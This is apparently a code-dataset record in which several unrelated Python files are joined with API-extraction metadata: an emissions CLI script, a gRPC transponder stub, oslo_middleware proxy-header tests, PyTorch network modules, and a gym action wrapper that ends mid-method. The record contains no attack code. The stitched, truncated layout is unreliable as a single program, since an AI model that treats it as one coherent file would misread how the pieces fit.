initial_p=ccp, relaxation_param=0.9,\n parameter_names=['variable_cost', 'replacement_cost'], npl_maxiter=50)\n", (4620, 4832), False, 'from source_ddc.algorithms import NFXP, NPL, CCP\n'), ((1351, 1384), 'numpy.abs', 'np.abs', (['(mean_params - true_params)'], {}), '(mean_params - true_params)\n', (1357, 1384), True, 'import numpy as np\n'), ((2526, 2559), 'numpy.abs', 'np.abs', (['(mean_params - true_params)'], {}), '(mean_params - true_params)\n', (2532, 2559), True, 'import numpy as np\n'), ((3736, 3769), 'numpy.abs', 'np.abs', (['(mean_params - true_params)'], {}), '(mean_params - true_params)\n', (3742, 3769), True, 'import numpy as np\n'), ((5104, 5137), 'numpy.abs', 'np.abs', (['(mean_params - true_params)'], {}), '(mean_params - true_params)\n', (5110, 5137), True, 'import numpy as np\n'), ((429, 449), 'numpy.log', 'np.log', (['(m_states + 1)'], {}), '(m_states + 1)\n', (435, 449), True, 'import numpy as np\n'), ((1578, 1598), 'numpy.log', 'np.log', (['(m_states + 1)'], {}), '(m_states + 1)\n', (1584, 1598), True, 'import numpy as np\n'), ((2753, 2773), 'numpy.log', 'np.log', (['(m_states + 1)'], {}), '(m_states + 1)\n', (2759, 2773), True, 'import numpy as np\n'), ((3980, 4000), 'numpy.log', 'np.log', (['(m_states + 1)'], {}), '(m_states + 1)\n', (3986, 4000), True, 'import numpy as np\n')]
|
#SAP DevelopmentChallange solution, written by <NAME> (<EMAIL>)
#Version: 01_28082020
#License: MIT
import sys
import argparse
from emissions import VehicleEmissions
#Important note: ArgumentParser converts any "-" to "_"
ap = argparse.ArgumentParser()
ap.add_argument("--distance", "-dist", help = "Total distance travelled")
ap.add_argument("--unit-of-distance", "-unit-dist", help = "Unit of distance: kilometers (default) or meters")
ap.add_argument("--transportation-method", "-tran-mthd", help = "Type of vehicle used for calculation")
ap.add_argument("--output", "-out", help = "Output of emissions in either kilograms or grams (default)")
args = vars(ap.parse_args())
#Get distance
if (args["distance"] == None):
sys.exit("No input distance given! Exiting...")
else:
input_distance = float(args["distance"])
#Get distance unit
if (args["unit_of_distance"] == None):
print("No unit of distance given, using KM by default")
distance_unit = "km"
else:
distance_unit = args["unit_of_distance"]
#Get vehcile type
if (args["transportation_method"] == None):
sys.exit("No vehicle type given! Exiting...")
else:
vehicle_type = args["transportation_method"] #one more name validity check is performed internally by the vehicle class
#Get output (optional)
output = args["output"]
#Global variables and parsing conditions
if (distance_unit == "m"):
input_distance = input_distance / 1000.0
#Create instance of vehicle object and calculate the emissions
vehicle = VehicleEmissions(vehicle_type)
vehicle.CalculateEmission(input_distance)
outputEmission = 0
if (output == "g"):
outputEmission = vehicle.GetEmissionGrams()
print("Your trip caused " + str(outputEmission) + "g of CO2-equivalent.")
elif (output == "kg"):
outputEmission = vehicle.GetEmmisionKG()
print("Your trip caused " + str(outputEmission) + "kg of CO2-equivalent.")
elif (output == None):
outputEmission = vehicle.GetEmmisionKG()
print("Your trip caused " + str(outputEmission) + "kg of CO2-equivalent.")
|
[
"emissions.VehicleEmissions",
"argparse.ArgumentParser",
"sys.exit"
] |
[((230, 255), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (253, 255), False, 'import argparse\n'), ((1487, 1517), 'emissions.VehicleEmissions', 'VehicleEmissions', (['vehicle_type'], {}), '(vehicle_type)\n', (1503, 1517), False, 'from emissions import VehicleEmissions\n'), ((727, 774), 'sys.exit', 'sys.exit', (['"""No input distance given! Exiting..."""'], {}), "('No input distance given! Exiting...')\n", (735, 774), False, 'import sys\n'), ((1078, 1123), 'sys.exit', 'sys.exit', (['"""No vehicle type given! Exiting..."""'], {}), "('No vehicle type given! Exiting...')\n", (1086, 1123), False, 'import sys\n')]
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from . import transponder_pb2 as transponder_dot_transponder__pb2
class TransponderServiceStub(object):
"""
Allow users to get ADS-B information
and set ADS-B update rates.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.SubscribeTransponder = channel.unary_stream(
'/mavsdk.rpc.transponder.TransponderService/SubscribeTransponder',
request_serializer=transponder_dot_transponder__pb2.SubscribeTransponderRequest.SerializeToString,
response_deserializer=transponder_dot_transponder__pb2.TransponderResponse.FromString,
)
self.SetRateTransponder = channel.unary_unary(
'/mavsdk.rpc.transponder.TransponderService/SetRateTransponder',
request_serializer=transponder_dot_transponder__pb2.SetRateTransponderRequest.SerializeToString,
response_deserializer=transponder_dot_transponder__pb2.SetRateTransponderResponse.FromString,
)
class TransponderServiceServicer(object):
"""
Allow users to get ADS-B information
and set ADS-B update rates.
"""
def SubscribeTransponder(self, request, context):
"""Subscribe to 'transponder' updates.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetRateTransponder(self, request, context):
"""Set rate to 'transponder' updates.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_TransponderServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'SubscribeTransponder': grpc.unary_stream_rpc_method_handler(
servicer.SubscribeTransponder,
request_deserializer=transponder_dot_transponder__pb2.SubscribeTransponderRequest.FromString,
response_serializer=transponder_dot_transponder__pb2.TransponderResponse.SerializeToString,
),
'SetRateTransponder': grpc.unary_unary_rpc_method_handler(
servicer.SetRateTransponder,
request_deserializer=transponder_dot_transponder__pb2.SetRateTransponderRequest.FromString,
response_serializer=transponder_dot_transponder__pb2.SetRateTransponderResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'mavsdk.rpc.transponder.TransponderService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
|
[
"grpc.unary_stream_rpc_method_handler",
"grpc.method_handlers_generic_handler",
"grpc.unary_unary_rpc_method_handler"
] |
[((2468, 2575), 'grpc.method_handlers_generic_handler', 'grpc.method_handlers_generic_handler', (['"""mavsdk.rpc.transponder.TransponderService"""', 'rpc_method_handlers'], {}), "(\n 'mavsdk.rpc.transponder.TransponderService', rpc_method_handlers)\n", (2504, 2575), False, 'import grpc\n'), ((1826, 2093), 'grpc.unary_stream_rpc_method_handler', 'grpc.unary_stream_rpc_method_handler', (['servicer.SubscribeTransponder'], {'request_deserializer': 'transponder_dot_transponder__pb2.SubscribeTransponderRequest.FromString', 'response_serializer': 'transponder_dot_transponder__pb2.TransponderResponse.SerializeToString'}), '(servicer.SubscribeTransponder,\n request_deserializer=transponder_dot_transponder__pb2.\n SubscribeTransponderRequest.FromString, response_serializer=\n transponder_dot_transponder__pb2.TransponderResponse.SerializeToString)\n', (1862, 2093), False, 'import grpc\n'), ((2148, 2422), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.SetRateTransponder'], {'request_deserializer': 'transponder_dot_transponder__pb2.SetRateTransponderRequest.FromString', 'response_serializer': 'transponder_dot_transponder__pb2.SetRateTransponderResponse.SerializeToString'}), '(servicer.SetRateTransponder,\n request_deserializer=transponder_dot_transponder__pb2.\n SetRateTransponderRequest.FromString, response_serializer=\n transponder_dot_transponder__pb2.SetRateTransponderResponse.\n SerializeToString)\n', (2183, 2422), False, 'import grpc\n')]
|
# Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from wsgiref import util
from oslotest import base as test_base
import webob
from oslo_middleware import http_proxy_to_wsgi
class TestHTTPProxyToWSGI(test_base.BaseTestCase):
def setUp(self):
super(TestHTTPProxyToWSGI, self).setUp()
@webob.dec.wsgify()
def fake_app(req):
return util.application_uri(req.environ)
self.middleware = http_proxy_to_wsgi.HTTPProxyToWSGI(fake_app)
self.middleware.oslo_conf.set_override('enable_proxy_headers_parsing',
True,
group='oslo_middleware')
self.request = webob.Request.blank('/foo/bar', method='POST')
def test_backward_compat(self):
@webob.dec.wsgify()
def fake_app(req):
return util.application_uri(req.environ)
self.middleware = http_proxy_to_wsgi.HTTPProxyToWSGIMiddleware(
fake_app)
response = self.request.get_response(self.middleware)
self.assertEqual(b"http://localhost:80/", response.body)
def test_no_headers(self):
response = self.request.get_response(self.middleware)
self.assertEqual(b"http://localhost:80/", response.body)
def test_url_translate_ssl(self):
self.request.headers['X-Forwarded-Proto'] = "https"
response = self.request.get_response(self.middleware)
self.assertEqual(b"https://localhost:80/", response.body)
def test_url_translate_ssl_port(self):
self.request.headers['X-Forwarded-Proto'] = "https"
self.request.headers['X-Forwarded-Host'] = "example.com:123"
response = self.request.get_response(self.middleware)
self.assertEqual(b"https://example.com:123/", response.body)
def test_url_translate_host_ipv6(self):
self.request.headers['X-Forwarded-Proto'] = "https"
self.request.headers['X-Forwarded-Host'] = "[fdf8:f53e:61e4::18]:123"
response = self.request.get_response(self.middleware)
self.assertEqual(b"https://[fdf8:f53e:61e4::18]:123/", response.body)
def test_url_translate_base(self):
self.request.headers['X-Forwarded-Prefix'] = "/bla"
response = self.request.get_response(self.middleware)
self.assertEqual(b"http://localhost:80/bla", response.body)
def test_url_translate_port_and_base_and_proto_and_host(self):
self.request.headers['X-Forwarded-Proto'] = "https"
self.request.headers['X-Forwarded-Prefix'] = "/bla"
self.request.headers['X-Forwarded-Host'] = "example.com:8043"
response = self.request.get_response(self.middleware)
self.assertEqual(b"https://example.com:8043/bla", response.body)
def test_rfc7239_invalid(self):
self.request.headers['Forwarded'] = (
"iam=anattacker;metoo, I will crash you!!P;m,xx")
response = self.request.get_response(self.middleware)
self.assertEqual(b"http://localhost:80/", response.body)
def test_rfc7239_proto(self):
self.request.headers['Forwarded'] = (
"for=foobar;proto=https, for=foobaz;proto=http")
response = self.request.get_response(self.middleware)
self.assertEqual(b"https://localhost:80/", response.body)
def test_rfc7239_proto_host(self):
self.request.headers['Forwarded'] = (
"for=foobar;proto=https;host=example.com, for=foobaz;proto=http")
response = self.request.get_response(self.middleware)
self.assertEqual(b"https://example.com/", response.body)
def test_rfc7239_proto_host_base(self):
self.request.headers['Forwarded'] = (
"for=foobar;proto=https;host=example.com:8043, for=foobaz")
self.request.headers['X-Forwarded-Prefix'] = "/bla"
response = self.request.get_response(self.middleware)
self.assertEqual(b"https://example.com:8043/bla", response.body)
def test_forwarded_for_headers(self):
@webob.dec.wsgify()
def fake_app(req):
return req.environ['REMOTE_ADDR']
self.middleware = http_proxy_to_wsgi.HTTPProxyToWSGIMiddleware(
fake_app)
forwarded_for_addr = '1.2.3.4'
forwarded_addr = '8.8.8.8'
# If both X-Forwarded-For and Fowarded headers are present, it should
# use the Forwarded header and ignore the X-Forwarded-For header.
self.request.headers['Forwarded'] = (
"for=%s;proto=https;host=example.com:8043" % (forwarded_addr))
self.request.headers['X-Forwarded-For'] = forwarded_for_addr
response = self.request.get_response(self.middleware)
self.assertEqual(forwarded_addr.encode(), response.body)
# Now if only X-Forwarded-For header is present, it should be used.
del self.request.headers['Forwarded']
response = self.request.get_response(self.middleware)
self.assertEqual(forwarded_for_addr.encode(), response.body)
class TestHTTPProxyToWSGIDisabled(test_base.BaseTestCase):
def setUp(self):
super(TestHTTPProxyToWSGIDisabled, self).setUp()
@webob.dec.wsgify()
def fake_app(req):
return util.application_uri(req.environ)
self.middleware = http_proxy_to_wsgi.HTTPProxyToWSGI(fake_app)
self.middleware.oslo_conf.set_override('enable_proxy_headers_parsing',
False,
group='oslo_middleware')
self.request = webob.Request.blank('/foo/bar', method='POST')
def test_no_headers(self):
response = self.request.get_response(self.middleware)
self.assertEqual(b"http://localhost:80/", response.body)
def test_url_translate_ssl_has_no_effect(self):
self.request.headers['X-Forwarded-Proto'] = "https"
self.request.headers['X-Forwarded-Host'] = "example.com:123"
response = self.request.get_response(self.middleware)
self.assertEqual(b"http://localhost:80/", response.body)
|
[
"oslo_middleware.http_proxy_to_wsgi.HTTPProxyToWSGIMiddleware",
"oslo_middleware.http_proxy_to_wsgi.HTTPProxyToWSGI",
"webob.Request.blank",
"wsgiref.util.application_uri",
"webob.dec.wsgify"
] |
[((869, 887), 'webob.dec.wsgify', 'webob.dec.wsgify', ([], {}), '()\n', (885, 887), False, 'import webob\n'), ((995, 1039), 'oslo_middleware.http_proxy_to_wsgi.HTTPProxyToWSGI', 'http_proxy_to_wsgi.HTTPProxyToWSGI', (['fake_app'], {}), '(fake_app)\n', (1029, 1039), False, 'from oslo_middleware import http_proxy_to_wsgi\n'), ((1267, 1313), 'webob.Request.blank', 'webob.Request.blank', (['"""/foo/bar"""'], {'method': '"""POST"""'}), "('/foo/bar', method='POST')\n", (1286, 1313), False, 'import webob\n'), ((1360, 1378), 'webob.dec.wsgify', 'webob.dec.wsgify', ([], {}), '()\n', (1376, 1378), False, 'import webob\n'), ((1486, 1540), 'oslo_middleware.http_proxy_to_wsgi.HTTPProxyToWSGIMiddleware', 'http_proxy_to_wsgi.HTTPProxyToWSGIMiddleware', (['fake_app'], {}), '(fake_app)\n', (1530, 1540), False, 'from oslo_middleware import http_proxy_to_wsgi\n'), ((4560, 4578), 'webob.dec.wsgify', 'webob.dec.wsgify', ([], {}), '()\n', (4576, 4578), False, 'import webob\n'), ((4679, 4733), 'oslo_middleware.http_proxy_to_wsgi.HTTPProxyToWSGIMiddleware', 'http_proxy_to_wsgi.HTTPProxyToWSGIMiddleware', (['fake_app'], {}), '(fake_app)\n', (4723, 4733), False, 'from oslo_middleware import http_proxy_to_wsgi\n'), ((5695, 5713), 'webob.dec.wsgify', 'webob.dec.wsgify', ([], {}), '()\n', (5711, 5713), False, 'import webob\n'), ((5821, 5865), 'oslo_middleware.http_proxy_to_wsgi.HTTPProxyToWSGI', 'http_proxy_to_wsgi.HTTPProxyToWSGI', (['fake_app'], {}), '(fake_app)\n', (5855, 5865), False, 'from oslo_middleware import http_proxy_to_wsgi\n'), ((6094, 6140), 'webob.Request.blank', 'webob.Request.blank', (['"""/foo/bar"""'], {'method': '"""POST"""'}), "('/foo/bar', method='POST')\n", (6113, 6140), False, 'import webob\n'), ((934, 967), 'wsgiref.util.application_uri', 'util.application_uri', (['req.environ'], {}), '(req.environ)\n', (954, 967), False, 'from wsgiref import util\n'), ((1425, 1458), 'wsgiref.util.application_uri', 'util.application_uri', (['req.environ'], {}), '(req.environ)\n', (1445, 1458), False, 'from wsgiref import util\n'), ((5760, 5793), 'wsgiref.util.application_uri', 'util.application_uri', (['req.environ'], {}), '(req.environ)\n', (5780, 5793), False, 'from wsgiref import util\n')]
|
import numpy as np
import torch
import torch.nn as nn
import functions.submodules as F
def norm_grad(input, max_norm):
if input.requires_grad:
def norm_hook(grad):
N = grad.size(0) # batch number
norm = grad.view(N, -1).norm(p=2, dim=1) + 1e-6
scale = (norm / max_norm).clamp(min=1).view([N]+[1]*(grad.dim()-1))
return grad / scale
# clip_coef = float(max_norm) / (grad.norm(2).data[0] + 1e-6)
# return grad.mul(clip_coef) if clip_coef < 1 else grad
input.register_hook(norm_hook)
def clip_grad(input, value):
if input.requires_grad:
input.register_hook(lambda g: g.clamp(-value, value))
def scale_grad(input, scale):
if input.requires_grad:
input.register_hook(lambda g: g * scale)
def func(func_name):
if func_name is None:
return None
elif func_name == 'tanh':
return nn.Tanh()
elif func_name == 'relu':
return nn.ReLU()
elif func_name == 'sigmoid':
return nn.Sigmoid()
elif func_name == 'softmax':
return nn.Softmax(dim=1)
else:
assert False, 'Invalid func_name.'
class CheckBP(nn.Module):
def __init__(self, label='a', show=1):
super(CheckBP, self).__init__()
self.label = label
self.show = show
def forward(self, input):
return F.CheckBP.apply(input, self.label, self.show)
class Identity(nn.Module):
def forward(self, input):
return F.Identity.apply(input)
class Log(nn.Module):
def __init__(self, eps=1e-20):
super(Log, self).__init__()
self.eps = eps
def forward(self, input):
return (input + self.eps).log()
class Round(nn.Module):
"""
The round operater which is similar to the deterministic Straight-Through Estimator
It forwards by rounding the input, and backwards with the original output gradients
"""
def forward(self, input):
return F.Round.apply(input)
class StraightThrough(nn.Module):
"""
The stochastic Straight-Through Estimator
It forwards by sampling from the input probablilities, and backwards with the original output gradients
"""
def forward(self, input):
return F.StraightThrough.apply(input)
class ArgMax(nn.Module):
"""
Input: N * K matrix, where N is the batch size
Output: N * K matrix, the one-hot encoding of arg_max(input) along the last dimension
"""
def forward(self, input):
assert input.dim() == 2, 'only support 2D arg max'
return F.ArgMax.apply(input)
class STGumbelSigmoid(nn.Module):
def __init__(self, tao=1.0):
super(STGumbelSigmoid, self).__init__()
self.tao = tao
self.log = Log()
self.round = Round()
def forward(self, mu):
log = self.log
u1 = torch.rand(mu.size()).cuda()
u2 = torch.rand(mu.size()).cuda()
a = (log(mu) - log(-log(u1)) - log(1 - mu) + log(-log(u2))) / self.tao
return self.round(a.sigmoid())
class STGumbelSoftmax(nn.Module):
def __init__(self, tao=1.0):
super(STGumbelSoftmax, self).__init__()
self.tao = tao
self.log = Log()
self.softmax = nn.Softmax(dim=1)
self.arg_max = ArgMax()
def forward(self, mu):
log = self.log
u = torch.rand(mu.size()).cuda() # N * K
# mu = CheckBP('mu')(mu)
a = (log(mu) - log(-log(u))) / self.tao
# a = CheckBP('a')(a)
return self.arg_max(self.softmax(a))
class GaussianSampler(nn.Module):
def forward(self, mu, log_var):
standard_normal = torch.randn(mu.size()).cuda()
return mu + (log_var * 0.5).exp() * standard_normal
class PermutationMatrixCalculator(nn.Module):
"""
Input: N * K matrix, where N is the batch size
Output: N * K * K tensor, with each K * K matrix to sort the corresponding row of the input
"""
def __init__(self, descend=True):
super(PermutationMatrixCalculator, self).__init__()
self.descend = descend
def forward(self, input):
assert input.dim() == 2, 'only support 2D input'
return F.PermutationMatrixCalculator.apply(input, self.descend)
class Conv(nn.Module):
def __init__(self, conv_features, conv_kernels, out_sizes, bn=0, dp=0):
super(Conv, self).__init__()
self.layer_num = len(conv_features) - 1
self.out_sizes = out_sizes
assert self.layer_num == len(conv_kernels) == len(out_sizes) > 0, 'Invalid conv parameters'
self.bn = bn
self.dp = dp
# Convolutional block
for i in range(0, self.layer_num):
setattr(self, 'conv'+str(i), nn.Conv2d(conv_features[i], conv_features[i+1],
(conv_kernels[i][0], conv_kernels[i][1]), stride=1,
padding=(conv_kernels[i][0]//2, conv_kernels[i][1]//2)))
if bn == 1:
setattr(self, 'bn'+str(i), nn.BatchNorm2d(conv_features[i+1]))
setattr(self, 'pool'+str(i), nn.AdaptiveMaxPool2d(tuple(out_sizes[i])))
if dp == 1:
setattr(self, 'dp'+str(i), nn.Dropout2d(0.2))
# Transformations
self.tranform = func('relu')
def forward(self, X):
H = X # N * D * H * W
for i in range(0, self.layer_num):
H = getattr(self, 'conv'+str(i))(H)
if self.bn == 1:
H = getattr(self, 'bn'+str(i))(H)
H = getattr(self, 'pool'+str(i))(H)
if self.dp == 1:
H = getattr(self, 'dp'+str(i))(H)
# if i == self.layer_num - 1:
# print(H.data[0, :, H.size(2)//2, H.size(3)//2].reshape(1, -1))
H = self.tranform(H)
# if i == self.layer_num - 1:
# print(H.data[0, :, H.size(2)//2, H.size(3)//2].reshape(1, -1))
return H
class DeConv(nn.Module):
def __init__(self, scales, conv_features, conv_kernels, conv_paddings, out_trans=None, bn=0, dp=0):
super(DeConv, self).__init__()
self.layer_num = len(conv_features) - 1
self.scales = scales
assert self.layer_num == len(scales) == len(conv_kernels) == len(conv_paddings) > 0, \
'Invalid deconv parameters'
self.bn = bn
self.dp = dp
# Convolutional block
for i in range(0, self.layer_num):
if scales[i] > 1:
setattr(self, 'unpool'+str(i), nn.Upsample(scale_factor=scales[i], mode='nearest'))
setattr(self, 'conv'+str(i), nn.Conv2d(conv_features[i], conv_features[i+1], conv_kernels[i],
stride=1, padding=tuple(conv_paddings[i])))
if bn == 1:
setattr(self, 'bn'+str(i), nn.BatchNorm2d(conv_features[i+1]))
if dp == 1:
setattr(self, 'dp'+str(i), nn.Dropout2d(0.2))
# Transformations
self.transform = func('relu')
self.out_trans_func = func(out_trans)
def forward(self, X):
H = X # N * D * H * W
# Hidden layers
for i in range(0, self.layer_num):
if self.scales[i] > 1:
H = getattr(self, 'unpool'+str(i))(H)
H = getattr(self, 'conv'+str(i))(H)
if self.bn == 1:
H = getattr(self, 'bn'+str(i))(H)
if self.dp == 1:
H = getattr(self, 'dp'+str(i))(H)
if i < self.layer_num - 1:
H = self.transform(H)
# Output layer
if self.out_trans_func is not None:
H = self.out_trans_func(H)
return H
class FCN(nn.Module):
def __init__(self, features, hid_trans='tanh', out_trans=None, hid_bn=0, out_bn=0):
super(FCN, self).__init__()
self.layer_num = len(features) - 1
assert self.layer_num > 0, 'Invalid fc parameters'
self.hid_bn = hid_bn
self.out_bn = out_bn
# Linear layers
for i in range(0, self.layer_num):
setattr(self, 'fc'+str(i), nn.Linear(features[i], features[i+1]))
if hid_bn == 1:
setattr(self, 'hid_bn_func'+str(i), nn.BatchNorm1d(features[i+1]))
if out_bn == 1:
self.out_bn_func = nn.BatchNorm1d(features[-1])
# Transformations
self.hid_trans_func = func(hid_trans)
self.out_trans_func = func(out_trans)
def forward(self, X):
H = X
# Hidden layers
for i in range(0, self.layer_num):
H = getattr(self, 'fc'+str(i))(H)
if i < self.layer_num - 1:
if self.hid_bn == 1:
H = getattr(self, 'hid_bn_func'+str(i))(H)
H = self.hid_trans_func(H)
# Output layer
if self.out_bn == 1:
H = self.out_bn_func(H)
if self.out_trans_func is not None:
H = self.out_trans_func(H)
return H
class CNN(nn.Module):
def __init__(self, params):
super(CNN, self).__init__()
self.conv = Conv(params['conv_features'], params['conv_kernels'], params['out_sizes'],
bn=params['bn'])
self.fcn = FCN(params['fc_features'], hid_trans='relu', out_trans=params['out_trans'],
hid_bn=params['bn'], out_bn=params['bn'])
def forward(self, X):
# X: N * D * H * W
# Conv
H = self.conv(X) # N * D_out1 * H_out1 * W_out1
# H = CheckBP('H_Conv')(H)
# FCN
H = H.view(H.size(0), -1) # N * (D_out1 * H_out1 * W_out1)
H = self.fcn(H) # N * D_out2
return H
class DCN(nn.Module):
def __init__(self, params):
super(DCN, self).__init__()
self.fcn = FCN(params['fc_features'], hid_trans='relu', out_trans='relu', hid_bn=params['bn'],
out_bn=params['bn'])
self.deconv = DeConv(params['scales'], params['conv_features'], params['conv_kernels'],
params['conv_paddings'], out_trans=params['out_trans'], bn=params['bn'])
self.H_in, self.W_in = params['H_in'], params['W_in']
def forward(self, X):
# X: N * D
# FCN
H = self.fcn(X) # N * (D_out1 * H_out1 * W_out1)
# Deconv
H = H.view(H.size(0), -1, self.H_in, self.W_in) # N * D_out1 * H_out1 * W_out1
H = self.deconv(H) # N * D_out2 * H_out2 * W_out2
return H
|
[
"functions.submodules.PermutationMatrixCalculator.apply",
"torch.nn.ReLU",
"torch.nn.Dropout2d",
"torch.nn.Tanh",
"functions.submodules.Identity.apply",
"torch.nn.BatchNorm1d",
"torch.nn.Conv2d",
"torch.nn.Linear",
"torch.nn.BatchNorm2d",
"torch.nn.Upsample",
"torch.nn.Softmax",
"functions.submodules.CheckBP.apply",
"functions.submodules.ArgMax.apply",
"functions.submodules.StraightThrough.apply",
"functions.submodules.Round.apply",
"torch.nn.Sigmoid"
] |
[((1378, 1423), 'functions.submodules.CheckBP.apply', 'F.CheckBP.apply', (['input', 'self.label', 'self.show'], {}), '(input, self.label, self.show)\n', (1393, 1423), True, 'import functions.submodules as F\n'), ((1499, 1522), 'functions.submodules.Identity.apply', 'F.Identity.apply', (['input'], {}), '(input)\n', (1515, 1522), True, 'import functions.submodules as F\n'), ((1976, 1996), 'functions.submodules.Round.apply', 'F.Round.apply', (['input'], {}), '(input)\n', (1989, 1996), True, 'import functions.submodules as F\n'), ((2248, 2278), 'functions.submodules.StraightThrough.apply', 'F.StraightThrough.apply', (['input'], {}), '(input)\n', (2271, 2278), True, 'import functions.submodules as F\n'), ((2567, 2588), 'functions.submodules.ArgMax.apply', 'F.ArgMax.apply', (['input'], {}), '(input)\n', (2581, 2588), True, 'import functions.submodules as F\n'), ((3226, 3243), 'torch.nn.Softmax', 'nn.Softmax', ([], {'dim': '(1)'}), '(dim=1)\n', (3236, 3243), True, 'import torch.nn as nn\n'), ((4165, 4221), 'functions.submodules.PermutationMatrixCalculator.apply', 'F.PermutationMatrixCalculator.apply', (['input', 'self.descend'], {}), '(input, self.descend)\n', (4200, 4221), True, 'import functions.submodules as F\n'), ((923, 932), 'torch.nn.Tanh', 'nn.Tanh', ([], {}), '()\n', (930, 932), True, 'import torch.nn as nn\n'), ((8242, 8270), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', (['features[-1]'], {}), '(features[-1])\n', (8256, 8270), True, 'import torch.nn as nn\n'), ((978, 987), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (985, 987), True, 'import torch.nn as nn\n'), ((4700, 4870), 'torch.nn.Conv2d', 'nn.Conv2d', (['conv_features[i]', 'conv_features[i + 1]', '(conv_kernels[i][0], conv_kernels[i][1])'], {'stride': '(1)', 'padding': '(conv_kernels[i][0] // 2, conv_kernels[i][1] // 2)'}), '(conv_features[i], conv_features[i + 1], (conv_kernels[i][0],\n conv_kernels[i][1]), stride=1, padding=(conv_kernels[i][0] // 2, \n conv_kernels[i][1] // 2))\n', (4709, 4870), True, 'import torch.nn as nn\n'), ((8037, 8076), 'torch.nn.Linear', 'nn.Linear', (['features[i]', 'features[i + 1]'], {}), '(features[i], features[i + 1])\n', (8046, 8076), True, 'import torch.nn as nn\n'), ((1036, 1048), 'torch.nn.Sigmoid', 'nn.Sigmoid', ([], {}), '()\n', (1046, 1048), True, 'import torch.nn as nn\n'), ((4956, 4992), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['conv_features[i + 1]'], {}), '(conv_features[i + 1])\n', (4970, 4992), True, 'import torch.nn as nn\n'), ((5143, 5160), 'torch.nn.Dropout2d', 'nn.Dropout2d', (['(0.2)'], {}), '(0.2)\n', (5155, 5160), True, 'import torch.nn as nn\n'), ((6450, 6501), 'torch.nn.Upsample', 'nn.Upsample', ([], {'scale_factor': 'scales[i]', 'mode': '"""nearest"""'}), "(scale_factor=scales[i], mode='nearest')\n", (6461, 6501), True, 'import torch.nn as nn\n'), ((6771, 6807), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['conv_features[i + 1]'], {}), '(conv_features[i + 1])\n', (6785, 6807), True, 'import torch.nn as nn\n'), ((6874, 6891), 'torch.nn.Dropout2d', 'nn.Dropout2d', (['(0.2)'], {}), '(0.2)\n', (6886, 6891), True, 'import torch.nn as nn\n'), ((8156, 8187), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', (['features[i + 1]'], {}), '(features[i + 1])\n', (8170, 8187), True, 'import torch.nn as nn\n'), ((1097, 1114), 'torch.nn.Softmax', 'nn.Softmax', ([], {'dim': '(1)'}), '(dim=1)\n', (1107, 1114), True, 'import torch.nn as nn\n')]
|
from typing import Union, List
import numpy as np
from gym import spaces, ActionWrapper
from gym.spaces import flatten_space, flatdim, unflatten, flatten
from sorting_gym import DiscreteParametric
def merge_discrete_spaces(input_spaces: List[Union[spaces.Discrete, spaces.Tuple, spaces.MultiBinary]]) -> spaces.MultiDiscrete:
"""
Merge nested Discrete, and MultiBinary spaces into a single MultiDiscrete space
TODO could also add support for MultiDiscrete
:param input_spaces:
:return:
"""
return spaces.MultiDiscrete(_discrete_dims(input_spaces))
def _discrete_dims(input_spaces: Union[spaces.Discrete, spaces.Tuple, spaces.MultiBinary]):
sizes = []
for space in input_spaces:
if isinstance(space, spaces.Discrete):
sizes.append(space.n)
elif isinstance(space, spaces.MultiBinary):
sizes.extend([2 for _ in range(space.n)])
elif isinstance(space, spaces.MultiDiscrete):
sizes.extend(space.nvec)
elif isinstance(space, spaces.Tuple):
sizes.extend(_discrete_dims(space.spaces))
return sizes
def _discrete_unflatten(argument_space, args):
"""
:param argument_space:
:param args:
:return:
"""
res = []
args = list(args)
while len(args) > 0:
if isinstance(argument_space, spaces.Discrete):
res.append(args.pop(0))
elif isinstance(argument_space, spaces.MultiDiscrete):
res.append(args[:argument_space.shape[0]])
del args[:argument_space.shape[0]]
elif isinstance(argument_space, spaces.MultiBinary):
res.append(args[:argument_space.n])
del args[:argument_space.shape[0]]
elif isinstance(argument_space, spaces.Tuple):
_num_tuple_args = _discrete_dims(argument_space.spaces)
res.append(args[:len(_num_tuple_args)])
del args[:len(_num_tuple_args)]
else:
raise NotImplemented
return res
class DisjointMultiDiscreteActionSpaceWrapper(ActionWrapper):
"""Expose a MultiDiscrete action space for each disjoint action space instead of a more complex nested space.
Wrapping a discrete parametric space with the following disjoint spaces:
Discrete(k),
Tuple([Discrete(k), MultiBinary(1)]),
Tuple([Discrete(k), Discrete(k)]),
should result in output spaces of:
MultiDiscrete([k]),
MultiDiscrete([k, 2]),
MultiDiscrete([k, k]
"""
def __init__(self, env):
assert isinstance(env.action_space, DiscreteParametric), (
"expected DiscreteParametric action space, got {}".format(type(env.action_space)))
super(DisjointMultiDiscreteActionSpaceWrapper, self).__init__(env)
self.parametric_space: DiscreteParametric = env.action_space
# Construct the modified disjoint spaces
self.disjoint_action_spaces = [merge_discrete_spaces([s]) for s in self.parametric_space.disjoint_spaces]
self.action_space = DiscreteParametric(env.action_space.parameter_space.n, self.disjoint_action_spaces)
def action(self, action):
"""
Convert an action using the merged MultiDiscrete disjoint space into a DiscreteParametric action.
"""
assert self.action_space.contains(action), "Given action is not valid in this action space"
